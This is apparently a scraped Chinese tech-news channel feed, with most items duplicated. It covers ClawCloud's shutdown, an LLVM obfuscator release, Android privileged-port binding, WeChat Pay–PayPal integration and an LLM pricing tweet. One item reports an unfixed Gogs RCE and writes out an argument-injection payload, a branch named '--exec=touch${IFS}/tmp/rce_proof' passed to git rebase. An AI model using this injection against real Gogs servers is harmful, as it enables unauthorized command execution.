好了,现在母项目 ClawCloud 也正式倒闭了,好似喵
https://claw.cloud/announcements/38?language=chinese-simplified
https://claw.cloud/announcements/38?language=chinese-simplified
https://github.com/komimoe/Arkari/releases/tag/llvm-20-obf1.9.1
反客为主
反客为主
GitHub
Release ArkariLLVM-20-obf1.9.1 · komimoe/Arkari
README !!!
写马的请移步: https://github.com/Yeuoly/0xUBypass
操你妈,谁用我的编译器写了个内核驱动的马丢我电脑上来了?
文件名: MedusaKernel.sys
SHA2: C3DB5B81415584223FE7BABA20AABBDEE4C07BB0871A1EC36C3EF1D4DE033CA3
分析:
1. 执行摘要
经过详细...
写马的请移步: https://github.com/Yeuoly/0xUBypass
操你妈,谁用我的编译器写了个内核驱动的马丢我电脑上来了?
文件名: MedusaKernel.sys
SHA2: C3DB5B81415584223FE7BABA20AABBDEE4C07BB0871A1EC36C3EF1D4DE033CA3
分析:
1. 执行摘要
经过详细...
Android已允许app绑定特权端口
这是通过 Connectivity/Tethering Mainline APEX 模块中的 eBPF cgroup 绑定钩子实现的。
该功能将作为 2026 年 5 月 Google Play 系统更新的一部分发布,该更新是 Android 17(包括最新 beta 版)的基本网络堆栈要求。
由于这是通过 cgroup/bind eBPF 程序动态评估的,因此系统避免降低全局 net.ipv4.ip_unprivileged_port_start sysctl 权限或全局分配 CAP_NET_BIND_SERVICE 权限。相反,它会选择性地允许特定的常用协议:
- TCP:20/21(FTP)、22(SSH/SFTP)、23(Telnet)、80(HTTP)、443(HTTPS)、445(SMB)、515(LPD)、631(IPP)
- UDP:319/320(PTP),443(HTTP/3 / QUIC)
激活此功能的条件:
- Android 13(API 33)或更高版本。在此之前的版本中,相关的 eBPF 代码尚未包含在主线版本中。
- 内核版本需为 5.15 或更高版本。这是一项硬性要求,因为旧版本内核缺少必要的 eBPF 返回标志基础架构,无法在绑定钩子期间绕过功能检查。
- 设备必须能够接收并积极应用 Google Play 系统更新(涵盖大多数标准认证的手机和平板电脑)。
注意:Android Auto、Wear、TV 或 Go 等应用可能会滞后,或者取决于系统供应商的完整 OTA 更新,具体取决于其主线实现情况。
源代码应该会与 Android 17 的其他部分一起发布,预计会在以下位置发布:
https://cs.android.com/android/platform/superproject/+/android-latest-release:packages/modules/Connectivity/bpf/progs/netd.c
这是通过 Connectivity/Tethering Mainline APEX 模块中的 eBPF cgroup 绑定钩子实现的。
该功能将作为 2026 年 5 月 Google Play 系统更新的一部分发布,该更新是 Android 17(包括最新 beta 版)的基本网络堆栈要求。
由于这是通过 cgroup/bind eBPF 程序动态评估的,因此系统避免降低全局 net.ipv4.ip_unprivileged_port_start sysctl 权限或全局分配 CAP_NET_BIND_SERVICE 权限。相反,它会选择性地允许特定的常用协议:
- TCP:20/21(FTP)、22(SSH/SFTP)、23(Telnet)、80(HTTP)、443(HTTPS)、445(SMB)、515(LPD)、631(IPP)
- UDP:319/320(PTP),443(HTTP/3 / QUIC)
激活此功能的条件:
- Android 13(API 33)或更高版本。在此之前的版本中,相关的 eBPF 代码尚未包含在主线版本中。
- 内核版本需为 5.15 或更高版本。这是一项硬性要求,因为旧版本内核缺少必要的 eBPF 返回标志基础架构,无法在绑定钩子期间绕过功能检查。
- 设备必须能够接收并积极应用 Google Play 系统更新(涵盖大多数标准认证的手机和平板电脑)。
注意:Android Auto、Wear、TV 或 Go 等应用可能会滞后,或者取决于系统供应商的完整 OTA 更新,具体取决于其主线实现情况。
源代码应该会与 Android 17 的其他部分一起发布,预计会在以下位置发布:
https://cs.android.com/android/platform/superproject/+/android-latest-release:packages/modules/Connectivity/bpf/progs/netd.c
Gogs RCE (NOT FIXED)
创建一个名为
git rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
创建一个名为
--exec=touch${IFS}/tmp/rce_proof 的 branchgit rebase --quiet '--exec=touch${IFS}/tmp/rce_proof' 'head_repo/feature'
https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/
https://x.com/_CryptoCat/status/2059987039198601673
Rapid7
Authenticated RCE via Argument Injection in Gogs (NOT FIXED)
Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue (Score: 150+ in 6 hours)
Link: https://readhacker.news/s/6V6tA
Comments: https://readhacker.news/c/6V6tA
Link: https://readhacker.news/s/6V6tA
Comments: https://readhacker.news/c/6V6tA
llmgame.scalex.dev
Continue? Y/N
A 30-second game about LLM permission fatigue. How carefully do you really read AI commands?
PayPal钱包接入微信支付 能直接扫码付款
微信支付今日发文官宣,腾讯 TenPay Global×PayPal World正式牵手。以后全球PayPal用户来华,打开PayPal 钱包,就能通过微信支付二维码消费。商家也不用换设备、改二维码,照常收款就行。用户可扫商家码,可出示付款码,商场、街边小店都能扫,目前已面向美国用户开放,其他国家陆续接入中。除了外国钱包,外国用户还能直接在微信绑定Visa、Mastercard等国际银行卡。首次绑定外卡用户:即日起至12月31日,绑定国际银行卡并完成首笔消费后,未来九十天内,单日1000元以内交易,可免3%外卡手续费。所有外卡用户:单笔交易200元内的消费都可免3%外卡手续费。
—— 微信支付
微信支付今日发文官宣,腾讯 TenPay Global×PayPal World正式牵手。以后全球PayPal用户来华,打开PayPal 钱包,就能通过微信支付二维码消费。商家也不用换设备、改二维码,照常收款就行。用户可扫商家码,可出示付款码,商场、街边小店都能扫,目前已面向美国用户开放,其他国家陆续接入中。除了外国钱包,外国用户还能直接在微信绑定Visa、Mastercard等国际银行卡。首次绑定外卡用户:即日起至12月31日,绑定国际银行卡并完成首笔消费后,未来九十天内,单日1000元以内交易,可免3%外卡手续费。所有外卡用户:单笔交易200元内的消费都可免3%外卡手续费。
—— 微信支付
你说得对,但是罗福莉女士曾经就大模型价格战问题发表过重要指示🤣
(参考翻译 By MiMo-V2.5 ,一字未改:我敦促LLM公司不要在弄清楚如何为编码计划定价而不大出血之前,盲目地进行价格战。以极低的价格销售代币,同时对第三方工具大开其门,对用户来说看似不错,但这其实是一个陷阱——正是Anthropic刚刚摆脱的那个陷阱。更深层次的问题是:如果用户将注意力浪费在低质量的代理工具、极不稳定且缓慢的推理服务,以及为了节省成本而降级的模型上,结果发现他们仍然无法完成任何事情——这对于用户体验和留存率来说都不是一个健康的循环。)
https://x.com/_LuoFuli/status/2040825059342721520
I'd urge LLM companies not to blindly race to the bottom on pricing before figuring out how to price a coding plan without hemorrhaging money. Selling tokens dirt cheap while leaving the door wide open to third-party harnesses looks nice to users, but it's a trap — the same trap Anthropic just walked out of. The deeper problem: if users burn their attention on low-quality agent harnesses, highly unstable and slow inference services, and models downgraded to cut costs, only to find they still can't get anything done — that's not a healthy cycle for user experience or retention.
(参考翻译 By MiMo-V2.5 ,一字未改:我敦促LLM公司不要在弄清楚如何为编码计划定价而不大出血之前,盲目地进行价格战。以极低的价格销售代币,同时对第三方工具大开其门,对用户来说看似不错,但这其实是一个陷阱——正是Anthropic刚刚摆脱的那个陷阱。更深层次的问题是:如果用户将注意力浪费在低质量的代理工具、极不稳定且缓慢的推理服务,以及为了节省成本而降级的模型上,结果发现他们仍然无法完成任何事情——这对于用户体验和留存率来说都不是一个健康的循环。)
https://x.com/_LuoFuli/status/2040825059342721520
